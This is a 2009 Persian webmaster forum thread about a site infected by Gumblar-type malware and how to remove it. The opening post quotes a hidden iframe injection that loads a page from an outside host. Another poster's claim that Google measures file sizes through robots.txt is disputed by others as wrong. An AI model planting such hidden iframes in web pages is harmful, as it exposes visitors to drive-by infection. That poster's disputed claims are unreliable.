ویروس در سایت و فایل های سایت

iraninic · Jul 6, 2009

سلام
سایت من الان چند روز شده که مشکل دار شده . وقتی در گوگل سرچ میکنی مینویسته : این پایگاه ممکن است به وبگاه شما آسیب برساند . در حالی که من هیچ کاری نکرده و تنها مقالاتتم را منتتشر کرده ام . وقتی یکی از فایل های سایت را باز کردم و سورسش رو دیدم متوجه شدم عبارتی به این شکل در آن قرار گرفته :
<iframe src="http://u3h.ru:8080/index.php" width=186 height=126 style="visibility: hidden"></iframe>
با اینکه دیتابیس رو در یه فولدری دیگه انتقال دادم و فایلها رو مجدد بارگزاری کردم بعد از چنددقیقه مجدد این مشکل ایجاد شد و باید اینم بگم که من فایل هایی که با پسوند html یا htm یا js بود رو به پرمیشن 444 نیز تبدیل کردم اما متاسفانه باز سایتم رو خراب کرده این ویروس . میگن اسمش : گامبلار هست که توی فایلهای html یا htm یا js ئ فایلهای ایندکس نفوذ میکنه . تورو خدا بگید من چکارکنم ؟

Mr.Steres · Jul 6, 2009

ما توی سرور خودمون امکاناتی رو داریم که کل سرور یا یک یوزر رو از نظر ویروس و تروجان و خلاصه بد فایل ها بررسی و ویروس کشی می کنه ! به ادمین سرور بگید و در راه دوم از اسکریپت های انتی ویروس و امنیتی استفاده کنید

gashtaran · Jul 8, 2009

آقا منم دقیقا همون ویروس بالا را در انجمن اس ام افم دارم و همونطور میشه
یه راه نشون بدین لطفا
دقیق و قدم بقدم برای رفع این ویروس

www.ahvazcity.net · Jul 9, 2009

برید تو انجمن های مامبولرن بگید حتما نتیجه بهتری می گیرید برای خود من تا به حال پیش نیومده

mambolearn · Jul 9, 2009

سلام

این مشکل در چند حالت پیش میاد :

1- سیستمی که به اف تی پی متصل میشه و یا با اون فایلها رو ادیت میکنید و آپلود میکنید مشکل داشته باشه و ویروسی باشه که در این صورت به سایت منتقل میشه
2- از اسکریپت های نال روی سایت استفاده کرده باشید ( همینطور که میدونید خیلی از این اسکریپتها حاوی کدهای مخرب هستند )

در این صورت باید ابتدا بفهمید مشکل ازکدوم مورد بالاست .
رفع کنید

به گوگل درخواست review بدید تا سایت شما رو از بلک لیست خارج کنه

یا علی

rahpoyan.ir · Jul 14, 2009

سلام
این قضیه چند تا حالت داره!
اول اینکه باید دید گوگل چی رو کد مخرب می دونه! مثلا اگه شما کدهای گذر از فیلتر رو روی سایتتون بریزید، پهنای باندی که از سایتتون میره با حجم فایلهاتون سازگاری نداره! در نتیجه گوگل این وب سایت رو مخرب میشناسه!
همین قضیه در مورد وب سایت هایی که مرتب در حال حملات ناموفق هکر ها هستند صادقه!
در ضمن اون چیزی هم که گفتید ربطی نداره! سورس فایل شما بسته به سرورتون (یعنی قالب بندی سورس شما) باید از طریق یک لینک خارجی پایه گذاری بشه تا مرورگر بتونه زبان صفحات شما رو تشخیص بده! این کار دلایل امنیتی و برنامه نویسی داره که الان حال نوشتنش رو ندارم!
در هر صورت اگه آدرس وب سایتت رو بدی من می تونم بهت بگم چه فایلی در کجا ویروسیه! البته اگه وب سایتتون واقعا ویروسی باشه!

mambolearn · Jul 15, 2009

اول اینکه باید دید گوگل چی رو کد مخرب می دونه! مثلا اگه شما کدهای گذر از فیلتر رو روی سایتتون بریزید، پهنای باندی که از سایتتون میره با حجم فایلهاتون سازگاری نداره! در نتیجه گوگل این وب سایت رو مخرب میشناسه!
همین قضیه در مورد وب سایت هایی که مرتب در حال حملات ناموفق هکر ها هستند صادقه!

میشه لطف کنید توضیح بیشتری در این مورد بدید !

برای صحبت هاتون مرجعی دارید ؟!

rahpoyan.ir · Jul 23, 2009

با سلام خدمت همه دوستان عزیز
اول اینکه بنده چیزی که تجربش رو داشتم نوشتم و شما هم می تونید این رو امتحان کنید.
ثانیا لطفا محترمانه تر صحبت کنید! چرا طلبکارید؟ لطفا لحنتون رو عوض کنید. اینجا یک فروم دوستانه است.
ثالثا بنده گفتم برید تحقیق کنید. نگفتم مرجعش رو خودم میگم بهتون، چون تا خود طرف تحقیق نکنه هیچ وقت حرفه ای نمیشه!
رابعا این جور چیزها امنیتیه! چون اگه قرار باشه مثلا یه آنتی ویروس بیاد بگه چطور ویروس یابی میکنه عملا خودش رو بر باد داده. در نتیجه گوگل نمی تونه برای شما کامل توضیح بده.
خامسا این صفحه ای که الان لینک میدم، مشکل این دوستمون رو داشته و از توی خود گوگل هم رفرنس شدست! لطفا جواب ها رو بخونید!
آقایونی که مرجع می خواید! ببینید و وقت بگذارید و بخونید.
http://googlewebmastercentral.blogspot.com/2008/08/hey-google-i-no-longer-have-badware.html
صفحه بالا رفرنس از این صفحست:
http://sites.google.com/site/webmasterhelpforum/en/faq-malware-and-hacked-sites
در هر صورت اینجا یک محیط دوستانست. جای این جور حرف ها نیست، هر کسی باید هرچی به نظرش می رسه بنویسه تا حداقل کمکی باشه یا روزنه ای باشه برای کمک به همدیگه.
در آخر هم از همه خیلی معذرت می خوام که یه مقدار تند صحبت کردم.
التماس دعا در قنوت نماز شبتان
یا حق

rahpoyan.ir · Jul 23, 2009

ضمنا من دیگه جرأت نمی کنم خودم ترجمه کنم بگذارم روی سایت! می ترسم به خاطر یک کلمه جریمم کنند!!!
ولی گوگل این راه حل ها رو پیشنهاد کرده:
ضمنا این هم بگم که اگه قبلا ویروس داشتید و یا هک شدید و حالا وب سایتتون رو درست کردید، حدود 15 الی 30 روز طول میکشه تا گوگل اون پیغام رو از توی سرچش حذف کنه! بنابر این منتظر نتیجه لحظه ای نباشید.(این که دیگه نیاز به منبع نداره؟)
1

. If you have badware, it usually means that your web server, your website, or a database used by your website has been compromised. We have a nifty post on how to handle being hacked. Be very careful when inspecting for malware on your site so as to avoid exposing your computer to infection.

2. Once everything is clear and dandy, you can follow the steps in our post about malware reviews via Webmaster Tools. Please note the screen shot on the previous post is outdated, and the new malware review form is on the Overview page and looks like this:

Other programs, such as Firefox, also use our badware data and may not recognize the change immediately due to their caching of the data. So even if the badware label in search is removed, it may take some time for that to be visible in such programs.

3. Lastly, if you believe that your rankings were somehow affected by the malware, such as compromised content that violated our Webmaster Guidelines [i.e. hacked pages with hidden pharmacy text links], you should fill out a reconsideration request. To clarify, reconsideration requests are usually used for when you notice issues stemming from violations of our Webmaster Guidelines and are separate from malware requests.

If you have additional questions, please review our documentation or post to the discussion group with the URL of your site. We hope you find this updated feature in Webmaster Tools useful in discovering and fixing any malware-related problems

.

mambolearn · Jul 23, 2009

اخوی !

از این محترمانه تر ! پست قبل من رو دوباره و صد باره مطالعه کنید ! شاید امروز چیز دیگه ای ناراحتتون کرده که به لحن 4 کلمه پست من گیر دادید ! هر چند معمولا ما وقتی صحبتهایی میکنیم که از روی ... هست و دیگران براش منبع میخوان بهمون بر میخوره !

منبع رو برای این جمله خواستم :
"اول اینکه باید دید گوگل چی رو کد مخرب می دونه! مثلا اگه شما کدهای گذر از فیلتر رو روی سایتتون بریزید، پهنای باندی که از سایتتون میره با حجم فایلهاتون سازگاری نداره! در نتیجه گوگل این وب سایت رو مخرب میشناسه!"

خیلی عذر میخوام ! گوگل به چه صورت سایز فایلهای روی سرور شما رو اندازه میگیره !!!! ؟ این جمله هم حاصل تجربیات شماست یا منبعی دارید ؟!

درسته اینجا جمعی دوستانه است اما به عنوان مدیر این بخش نمیتونم بذارم هر مطلبی بدون سند و یا بار علمی نوشته بشه و عده ای که این مطلب رو میخونن به اشتباه بیوفتند !
هدف ما اینجا یاد گیری و آموزش مطالب درست هست نه مطالبی رو منتشر کنیم که نه علمی در اون هست و نه منطق !

در مورد جمله بالا اگر صحبت ، دلیل ، منبع ، مرجع و یا نکاتی دارید بیان کنید در غیر اینصورت اگر خواستید بحثی کنید که هیچ بار علمی نداره به صورت خصوصی پیام بدید تا مفصل صحبت کنیم !

مثلا اگه شما کدهای گذر از فیلتر رو روی سایتتون بریزید، پهنای باندی که از سایتتون میره با حجم فایلهاتون سازگاری نداره! در نتیجه گوگل این وب سایت رو مخرب میشناسه!

!!!!

یا علی

rahpoyan.ir · Jul 25, 2009

سلام
اولا من به شما علاقه مندم! برادر من شما خودت اوستای ما هستی! فقط کافی یه کم فکر کنی تا بفهمی گوگل چطور حجم فایل های شما رو اندازه میگیره! فقط یه راهنمایی به شما می کنم... فایل Robot.txt! یکی از راه هاشه!
ثانیا من باز هم به شما علاقه مندم! ولی شما یه حرف هایی می زنید! بنده گفتم این جا هرکی هر نظری داره باید بگه تا حداقل یه روزنه ای باشه! حتی اگه حرف طرف نامربوط هم باشه، بازهم طرف امیدوار میشه! که حداقل پستش داره پیش میره!
حالا عیبی نداره! پیش میاد دیگه!
ثالثا بنده مثال هایی دارم که در خیلی از جاهای مجید آنلاین جواب هایی داده میشه که هیچ ربطی به موضوع نداره! بگم؟؟ بگم لینکارو؟؟

ضمنا این رو یادم رفت بگم! شما معنی BadWare رو میدونید؟؟
در این رابطه هم تحقیق کنید تا به صحت صحبت های من پی ببری!

BehrouzPc · Jul 25, 2009

دوستان عزیز بنده در باره این موضوع و چند نوع این ویروس ها که عمدتا از راه رایانه مدیر سایت و بیشتر از راه نرم افزارهای مدیریت اف تی پی اتفاق می افته توضیح داده ام که اگه جستجو کنید پیدا میکنید
ولی در مورد وباره ساخته شدن باید بگه که این ویروس خودشو به همه فایلا اضافه می کنه که یا اسمشون function , config , ... باشه یا جایی include شده باشن
در کل همه فایهای می بایست دوباره بارگزاری بشه
ولی نگته این ویروس ها اینه که توی هر پوشه images که وجود داشته باشه یه فایل با نام image.php می یازه باز سازی کننده ویروس می باشد و باید با یک فایل خالی با همین نام جا به جا بشه بعد درستری فایل رو محدود کنید که حتی مدیریت هم نتونه ویرایشش کنه مثل 200 و یا 400 و یا 000 بعد از حذف ویروس و این اقدام در تمامی پوشه های موجود با نام images می بایست رمز هاست خود را تغییر دهید و با این کار جلوی ویروس رو بگیرید

قبل از انجام این کار هر نرم افزار اف تی پی که روی کاپبوتر خود دارید را پاک نمایید و سیستم خود را با آنتی ویروس چک کنید و بعد از آن سیستم خود را با یک anti maleware چک کنید چون maleware در واقع از سیستم شما به سایت شما منتقل شده پس باید قبل از انجام کارهای بالا اون رو از سیستمتون رفع کنید و یا فعلا با یک سیستمی که آلوده نیست این کار را انجام دهید و گر نه ویروس خود را دوباره در حال آپلود شما جای گزاری می کنه و بعد از مدیت کوتاهی دوباهر فعال می شود

قدرت این ویروس در اتشار سریع از طیق ویرایش و از نو نویسی کد تمامی فایلهای مود حمله و فقط افزودن کدی در هدر آن ها که کدی را در محل بعد از تگ head بسته قرار می دهد که می تواند اطلاعات کاربران شما و اطلاعات خود شما را به سرقت ببرند و این نوع ویروس همون جوی که اشاره کردن از نوع maleware می باشند

موفق و پیروز باشید

mambolearn · Jul 29, 2009

rahpoyan.ir گفت:
سلام
اولا من به شما علاقه مندم! برادر من شما خودت اوستای ما هستی! فقط کافی یه کم فکر کنی تا بفهمی گوگل چطور حجم فایل های شما رو اندازه میگیره! فقط یه راهنمایی به شما می کنم... فایل Robot.txt! یکی از راه هاشه!
ثانیا من باز هم به شما علاقه مندم! ولی شما یه حرف هایی می زنید! بنده گفتم این جا هرکی هر نظری داره باید بگه تا حداقل یه روزنه ای باشه! حتی اگه حرف طرف نامربوط هم باشه، بازهم طرف امیدوار میشه! که حداقل پستش داره پیش میره!
حالا عیبی نداره! پیش میاد دیگه!
ثالثا بنده مثال هایی دارم که در خیلی از جاهای مجید آنلاین جواب هایی داده میشه که هیچ ربطی به موضوع نداره! بگم؟؟ بگم لینکارو؟؟
ضمنا این رو یادم رفت بگم! شما معنی BadWare رو میدونید؟؟
در این رابطه هم تحقیق کنید تا به صحت صحبت های من پی ببری!

گوگل از طریق robots.txt میتونه حجم ( SIZE ) فایل رو اندازه بگیره !!!!؟ فایل PHP ?!?!?!!?

معنی Server Side رو میدونید شما ؟! تفاوت HTML & PHP رو چطور ؟!

مگه فایل PHP اچ تی ام ال هست که بشه سایزش رو با Browse کردن فهمید !!

فرض میکنیم تمام صحبتهای من اشتباه ! شما برای اینکه به من و بقیه این موضوع رو نشون بدید لطف کنید بگید حجم فایل http://www.mambolearn.com/fa/index.php چقدره !!!

ببین دوست من به دست آوردن حجم فایل PHP به خاطر اینکه سرورساید هست غیر ممکنه ! شما فقط حجم فایل HTML رو میتونید تشخیص بدید نه PHP !!! یعنی در واقع شما حجم خروجی HTML

در رابطه با robots.txt ! شما مقاله زیر رو مطالعه کنید تا کاملا متوجه بشید که ROBOTS.TXT چیه ! کارش چیه ! و اینکه هیییییچ ربطی به پیدا کردن سایز فایل نداره !!!

robots.txt چیست ؟

لطفا اگر خواستید جواب بدید ابتدای پست بنویسید حجم ایندکس دات پی اچ پی که آدرسش رو دادم چقدره سپس صحبتتون رو ادامه بدید !

یا علی

iraninic · Jul 31, 2009

من خودم ویروس ها رو حذف کردم .
حالا روشش رو می گم به همه دوستان محترم :

ببینید اغلب این گونه ویروس ها از طریق سیستم خودتون وارد سایت شما میشن و این ورود تنها زمانی صورت میگیره که شما از طریق اف تی پی یا سی پنل به سایت خودتون وصل میشید و اقدام به ارسال فایل به سایت می کنید .
ابتدا به روش زیر عمل کنید :
1 - از بانک اطلاعاتی سایت خودتون یک بک آپ بگیرید .
2 - فایل بک آپ رو در سیستم خودتون ذخیره کنید و به هیچ عنوان باز نکنید .
3 - سیستم خود را مجدد نصب کنید . با نصب ویندوز جدید بسیاری از ویروس ها و تروجان ها در سیستم خاموش شده و غیرفعال می شوند اما به محض فعالیت مجدد آنها فعال می شوند .پس بعد از نصب ویندوز جدید ابتدا آنتی ویروس را در سیستم خود فعال کنید و اقدام به ویروس یابی نمائید .
4 - حال به اف تی پی سایت خود وصل شده و کلیه فایل های موجود در سایت خود را حذف نمائید .
5 - سپس فایل های سایت خود را مجدد آپلود کنید .
6 - به سی پنل سایت رفته و بک آپی که قبلا در قسمت (1) گرفته بودید را ایمپورت کنید تا محتوای سایت شما مجدد باز گردد .
7 - حال سایت خود را باز کنید و از نبودن ویروس در سایت خود لذت ببرید .

ممکن است سایت شما از موتورهای جستجو حذف شده باشد که اینگونه نیز هست . پس اصلا نترسید . درست است که بازدیدهای بسیاری از دست داده اید اما خوشبختانه خیلی زود توانستید برگردید .
حال سایت خود را مجدد بروز رسانی کنید و خبر راه اندازی وب سایت خود را به بازدیدکنندگان بدهید .
در کمتر از یک هفته مجدد گوگل سایت شما در موتور جستجوی خود قرار می دهد و از لیست سایت های سیاه در می آورد .
این راه را که گفتم خودتان انجام دهید چون اصلا نیاز به هیچ تخصص و زمانی ندارد . بسیار افرادی هستند که با سو استفاده برای همین هفت قدم که آموزش دادم مبالغی همچون 50 تا 80 هزارتومان دریافت می کنند .

اگر مشکلی در اجرای این راهها داشتید به من خبردهید تا برای شما رفع کنم .
موفق باشید .

rahpoyan.ir · Aug 4, 2009

سلام
ببین برادر من
بنا نشد که اینطوری پیش بری!!!
من دارم میگم استفاده از اسکریپ های گذر از فیلتر باعث این قضیه میشه! این که کاملا قابل فهمه!!!
شما بیخودی بحث رو کشوندی به حجم فایلهای PHP!!!
یه کم فکر کنید می فهمید چطور میشه فهمید که یک سایت داره از BadWare استفاده می کنه!!!
ضمنا لطفا پاسخ های خودتون رو در مورد مسائل زیر بگید، چون این حرف های من بی جواب موند!
مورد شماره 1:

ثانیا من باز هم به شما علاقه مندم! ولی شما یه حرف هایی می زنید! بنده گفتم این جا هرکی هر نظری داره باید بگه تا حداقل یه روزنه ای باشه! حتی اگه حرف طرف نامربوط هم باشه، بازهم طرف امیدوار میشه! که حداقل پستش داره پیش میره

!
مورد شماره 2

پاسخ، پاسخ احتمالی شما هم هست)

ثالثا بنده مثال هایی دارم که در خیلی از جاهای مجید آنلاین جواب هایی داده میشه که هیچ ربطی به موضوع نداره! بگم؟؟ بگم لینکارو؟؟

مورد شماره 3:

ضمنا این رو یادم رفت بگم! شما معنی BadWare رو میدونید؟؟
در این رابطه هم تحقیق کنید تا به صحت صحبت های من پی ببری

!
موارد بسیار زیاد دیگری که بی جواب مانده اند هست که ابدا حالش رو ندارم!
ضمنا در مورد حجم اون فایل:
یک چیزی هست به نام مغالطه! چیزی که وقتی کم بیارند ازش استفاده می کنند. این خیلی مهمه که طرف توی بحث مغالطه نکنه، چون مقدمه ایست بر جدل! و جدل طبق نص صریح قرآن حرام است!
بنده ابدا حرفی از این نیاوردم که گوگل حجم همه فایل های همه سایت ها رو حساب می کنه! گفتم این یکی از راه هاست که برای سایت هایی که اسکریپت گذر از فیلترینگ دارند بسیار بسیار مناسبه و ازش هم استفاده میشه!

cyber_ruiner · Aug 7, 2009

پست شما راجع به اندازه گیری حجم فایلها از طریق robots.txt

rahpoyan.ir گفت:
سلام
فقط کافی یه کم فکر کنی تا بفهمی گوگل چطور حجم فایل های شما رو اندازه میگیره! فقط یه راهنمایی به شما می کنم... فایل Robot.txt! یکی از راه هاشه!

rahpoyan.ir گفت:
ضمنا در مورد حجم اون فایل:
بنده ابدا حرفی از این نیاوردم که گوگل حجم همه فایل های همه سایت ها رو حساب می کنه! گفتم این یکی از راه هاست که برای سایت هایی که اسکریپت گذر از فیلترینگ دارند بسیار بسیار مناسبه و ازش هم استفاده میشه!

!!!

mambolearn گفت:
معنی Server Side رو میدونید شما ؟! تفاوت HTML & PHP رو چطور ؟!

مگه فایل PHP اچ تی ام ال هست که بشه سایزش رو با Browse کردن فهمید !!

مغالطه نکردن ایشون...والا هر کس دیگه هم بود با این جمله ی شما تعجب میکرد که گوگل از طریق robots.txt حجم فایل رو میگیره.

بیشتر کار شما شبیه به مغالطه است دوست محترم.

یا علی

rahpoyan.ir · Aug 8, 2009

اولا سلام
ثانیا با خوندن پست شما خندم گرفت!!!
ثالثا خودت یه بار دیگه همه نقل قول ها رو به دقت بخون!!! می فهمی چرا من خندم گرفت! خودت نشون دادی که مغالطه شده!!!
رابعا بنده ابدا حرفی نیاوردم که گوگل حجم فایلهای همه سایت ها رو حساب می کنه!!!
خامسا بنده این پست شما رو به فال نیک گرفتم و گفتم حتما اشتباه لفظی بوده! یعنی از اون دسته پاچه خواران مدیر نیستید!
انشالله خدا به همه ما توفیق علم و عمل صالح عنایت کنه!
والسلام علیکم و رحمه الله

cyber_ruiner · Aug 8, 2009

سلام

برای شما متاسفم با این ادبیاتتون. سعی کنید کمی محترم باشید و شخصیت خودتون رو حفظ کنید!
بنده کوچکترین توهینی به شما نکردم. اما شما مثل اینکه خیلی بهتون برخورده!

آقای فیروزمندان استاد بنده هستند و سه ساله که با ایشون رابطه ی کاری دارم و باز هم براتون متاسفم با این طرز حرف زدن.....اگر سنتون بالاست سعی کنید بزرگ بشید، اگر هم سنتون پایینه امیدوارم با بالا رفتن سنتون، بزرگ هم بشید.

در مورد ادعاتون: حرف شما از پایه اشتباه است، چه 1 سایت چه همه ی سایت ها.